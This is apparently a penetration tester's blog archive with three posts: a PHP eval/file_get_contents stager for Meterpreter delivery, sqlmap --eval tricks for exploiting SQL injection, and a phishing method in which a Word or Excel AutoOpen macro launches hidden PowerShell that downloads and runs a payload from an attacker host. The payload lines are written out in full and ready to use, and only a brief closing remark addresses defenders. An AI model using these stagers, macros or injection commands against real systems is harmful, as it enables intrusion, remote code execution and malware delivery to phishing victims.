Friday, February 21, 2014

PHP Meterpreter Web Delivery

I recently found myself in a situation where I had command execution through a web application and but wanted to upgrade to a reverse shell that included Meterpreter functionality. I had two roadblocks as I needed to bypass antivirus and some of the local exe's were locked down, such as powershell (sadface), net commands, ipconfig, etc. (sidenote: shoutout to Chris (@obscuresec) for some great ideas on getting around locked down files)

After some research I was able to establish a simple PHP command and control-type scenario where the server would reach out to me and execute whatever code I specified on my attacking machine using a combination of eval and file_get_contents. This way it left a very small footprint (one line) on the target machine and I was able to execute larger blocks of code as my initial command execution bug was limited by length. The PHP code went something like this:

<?php eval(file_get_contents('http://attacker/boom.txt'); ?>

This way I had no size limitations and had access to all the functionality of PHP, which is quite a bit. I ended up enumerating the internal network using PHP to do things like scan ports, grab internal web pages, etc.

All this to say, it got me thinking and after a quick refresher, I dove back into ruby world to try to hack together a metasploit module that will automate this and provide the elusive meterpreter. The super flexible, ninja module structure credit goes to Ben Campbell (@meatballs__).

Simply configure the options



..and execute the printed command on the targeted system



Update*
I have added support for python and combined this module with the psh_web_delivery module. The resulting module has been merged into the metasploit framework. You can find the module here.

Friday, January 17, 2014

Using SQLMAP's Eval Functionality for Successful Exploitation

Recently I was performing a web application assessment and ran across a SQL injection bug. This bug was verified by two different tools and one of those tools was even able to pull back the database name, but nothing else. As usual, I turned to my favorite SQLi exploitation tool, SQLMAP.

After spending a while trying to get SQLMAP to find the injection being specific as I could and increasing the level flag, I began to realize that I was going to need to customize some parts of the requests. I eventually located the issue, being that a successful injection required a %09 (URL encoded version of a tab) instead of a %20 (URL encoded version of a space).

It is for this very type of scenario that SQLMAP implements the --eval flag, allowing the user to execute any python code at run-time before each request is sent. All you need to do is reference the parameter that you want to modify, such as "id", etc. The example in the wiki located here illustrates the proper syntax:
--eval="import hashlib;id2=hashlib.md5(id).hexdigest()"
In this instance they are setting "id2" parameter to the MD5 value of the "id" parameter.

Keeping this awesome feature in mind, I decided to use pythons replace() method to modify the space characters (%20) and replace them with tab characters (%09). We will also need to escape quotes so that we do not terminate the eval parameter.

My initial attack went something like this:
./sqlmap.py -l bob.txt -p email --eval="email=email.replace(\"%20\",\"%09\",15)" -v 5
This attack, however, still failed as the requests were still using the %20 as the space character instead of the %09.

After some digging through the source code, it was apparent that I would need to use the actual space character " " instead of its URL-encoded represetatation:
 ./sqlmap.py -l bob.txt -p email --eval="email=email.replace(\" \",\"%09\",15)" -v 5
This time I saw that the requests were being successfully modified and was greeted with the pretty green text:


This just shows one possible use for this super powerful flag within SQLMAP, and another reason why the tool is only as good as the tester using it, as this was the difference between a relatively* successful and unsuccessful exploitation.

* I say relatively because I ended up enumerating the username manually so i didnt technically need SQLMAP, but a tool like SQLMAP just makes extracting data SO much faster.

Monday, January 13, 2014

Phishing with PowerShell

I have seen quite a few tweets/comments/etc about using Powershell's functionality within the context of a Microsoft Office document/VBA (https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroCode). I am going to share a way I have been leveraging Powershell for payload delivery during phishing engagements for a while now to achieve the same end result in a much simpler fashion. The two stages are as follows:

Attacker Machine:
msf > use exploit/windows/misc/psh_web_delivery
msf exploit(psh_web_delivery) > set SRVHOST 172.16.5.11
msf exploit(psh_web_delivery) > set URIPATH boom
msf exploit(psh_web_delivery) > exploit

VBA Macro:
Sub AutoOpen()

    Call Shell("powershell.exe -w hidden -nop -ep bypass -c ""IEX ((new-object net.webclient).downloadstring('http://172.16.5.11:8080/boom'))""", 1)
End Sub

*Note: If you are using a Excel document, your macro will need to be named Auto_Open()

Save the document as a macro-enabled file.
Send to target, and upon opening....





Meanwhile back at the bat cave...



This highlights yet another reason for defenders to lock down Powershell on workstations as much as possible.